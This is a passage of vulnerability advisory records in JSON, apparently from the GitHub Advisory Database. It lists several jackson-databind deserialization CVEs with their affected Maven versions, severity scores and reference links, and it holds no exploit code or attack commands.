"https://github.com/FasterXML/jackson-databind/commit/ad5a630174f08d279504bc51ebba8772fd71b86b" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20201009-0003" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2021-03-18T23:41:09Z", "nvd_published_at": "2020-09-17T19:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-qmqc-x3r4-6v39", "published": "2020-05-15T18:59:07Z", "modified": "2024-12-02T05:41:11.671530Z", "aliases": [ "CVE-2019-14893" ], "summary": "Polymorphic deserialization of malicious object in jackson-databind", "details": "A flaw was discovered in FasterXML jackson-databind in all versions before 2.9.10 and 2.10.0, where it would permit polymorphic deserialization of malicious objects using the xalan JNDI gadget when used in conjunction with polymorphic type handling methods such as `enableDefaultTyping()` or when @JsonTypeInfo is using `Id.CLASS` or `Id.MINIMAL_CLASS` or in any other way which ObjectMapper.readValue might instantiate objects from unsafe sources. An attacker could use this flaw to execute arbitrary code.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-qmqc-x3r4-6v39/GHSA-qmqc-x3r4-6v39.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-14893" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2469" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/998efd708284778f29d83d7962a9bd935c228317" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0729" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14893" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200327-0006" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-04-22T20:58:45Z", "nvd_published_at": "2020-03-02T21:15:00Z", "severity": "HIGH" } }, { "schema_version": "1.7.3", "id": "GHSA-qr7j-h6gg-jmgc", "published": "2019-07-16T17:42:21Z", "modified": "2024-03-11T05:21:14.313980Z", "aliases": [ "CVE-2018-11307" ], "summary": "Deserialization of Untrusted Data in jackson-databind", "details": "An issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.5. Use of Jackson default typing along with a gadget class from iBatis allows exfiltration of content. Fixed in 2.7.9.4, 2.8.11.2, and 2.9.6.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.7.9.4" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.9.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-qr7j-h6gg-jmgc/GHSA-qr7j-h6gg-jmgc.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.2" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.8.11.1", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-qr7j-h6gg-jmgc/GHSA-qr7j-h6gg-jmgc.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.6" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-qr7j-h6gg-jmgc/GHSA-qr7j-h6gg-jmgc.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-11307" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-7525" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2032" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/051bd5e447fbc9539e12a4fe90eb989dba0c656" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb73" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/78e78738d69adcb59fdac9fc12d9053ce8809f3d" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/7fcf88aff0d1deaa5c3c7be8d58c05ad7ad5da94b59065d8e7c50c5d@%3Cissues.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:4037" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3892" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3140" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3002" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2804" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1823" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1822" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0782" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2019-07-16T00:41:07Z", "nvd_published_at": "2019-07-09T16:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-qxxx-2pp7-5hmx", "published": "2018-10-16T17:21:35Z", "modified": "2024-03-11T05:19:49.080060Z", "aliases": [ "CVE-2017-7525" ], "summary": "jackson-databind is vulnerable to a deserialization flaw", "details": "A deserialization flaw was discovered in the jackson-databind, versions before 2.6.7.1, 2.7.9.1 and 2.8.9, which could allow an unauthenticated user to perform code execution by sending the maliciously crafted input to the readValue method of the ObjectMapper.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.6.7.1" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.6.7.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-qxxx-2pp7-5hmx/GHSA-qxxx-2pp7-5hmx.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.9.1" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.9.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-qxxx-2pp7-5hmx/GHSA-qxxx-2pp7-5hmx.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.9" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-qxxx-2pp7-5hmx/GHSA-qxxx-2pp7-5hmx.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-7525" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/1723" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/1599" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/fd8dec2c7fab8b4b4bd60502a0f1d63ec23c24da" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/fa87c1ddbe803ebb7295f5c2ebfe38e12f6e6162" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/3bfbb835e530055c1941ddf87fde0b08d08dcd38" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/680d75b011edd67a2d2a2e9980998a968194c2ef" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/6ce32ffd18facac6abdbbf559c817b47fcb622c1" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/90042692085deeb05ae75c569c9909f7dba24415" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-qxxx-2pp7-5hmx" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3c87dc8bca99a2b3b4743713b33d1de05b1d6b761fdf316224e9c81f@%3Cdev.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/4641ed8616ccc2c1fbddac2c3dc9900c96387bc226eaf0232d61909b@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5008bcbd45ee65ce39e4220b6ac53d28a24d6bc67d5804e9773a7399@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b1f33fe5ade396bb903fdcabe9f243f7692c7dfce5418d3743c2d346@%3Cdev.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2017/dsa-4004" }, { "type": "WEB", "url": "https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US\u0026docId=emr_na-hpesbhf03902en_us" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20171214-0002" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00039.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00037.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf7f87810c38dc9abf9f93989f76008f504cbf7c1a355214640b2d04c@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r68acf97f4526ba59a33cc6e592261ea4f85d890f99e79c82d57dd589@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r42ac3e39e6265db12d9fc6ae1cd4b5fea7aed9830dc6f6d58228fed7@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f60afd3c7e9ebaaf70fad4a4beb75cf8740ac959017a31e7006c7486@%3Cdev.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f095a791bda6c0595f691eddd0febb2d396987eec5cbd29120d8c629@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/c9d5ff20929e8a3c8794facf4c4b326a9c10618812eec356caa20b87@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/c2ed4c0126b43e324cf740012a0edd371fd36096fd777be7bfe7a2a6@%3Cdev.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/c10a2bf0fdc3d25faf17bd191d6ec46b29a353fa9c97bebd7c4e5913@%3Cdev.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:1834" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:1835" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:1836" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:1837" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:1839" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:1840" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:2477" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:2546" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:2547" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:2633" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:2635" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:2636" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:2637" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:2638" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3141" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3454" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3455" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3456" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3458" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0294" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0342" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1449" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1450" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0910" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1462702" }, { "type": "WEB", "url": "https://cwiki.apache.org/confluence/display/WW/S2-055" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html" } ], "database_specific": { "cwe_ids": [ "CWE-184", "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:53:14Z", "nvd_published_at": "2018-02-06T15:29:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-r3gr-cxrf-hg25", "published": "2021-12-09T19:15:11Z", "modified": "2024-06-25T14:20:21.323050Z", "aliases": [ "CVE-2020-35491" ], "summary": "Serialization gadgets exploit in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.datasources.SharedPoolDataSource.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.9.10.8" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.7", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-r3gr-cxrf-hg25/GHSA-r3gr-cxrf-hg25.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-35491" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2986" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/41b8bdb5ccc1d8edb71acf1c8234da235a24249d" }, { "type": "WEB", "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210122-0005" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502", "CWE-913" ], "github_reviewed": true, "github_reviewed_at": "2021-04-08T21:05:38Z", "nvd_published_at": "2020-12-17T19:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-r695-7vr9-jgc2", "published": "2021-12-09T19:16:51Z", "modified": "2024-02-18T05:30:45.856594Z", "aliases": [ "CVE-2020-36187" ], "summary": "Unsafe Deserialization in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.9.10.8" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-r695-7vr9-jgc2/GHSA-r695-7vr9-jgc2.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36187" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2997" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1" }, { "type": "WEB", "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210205-0005" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": 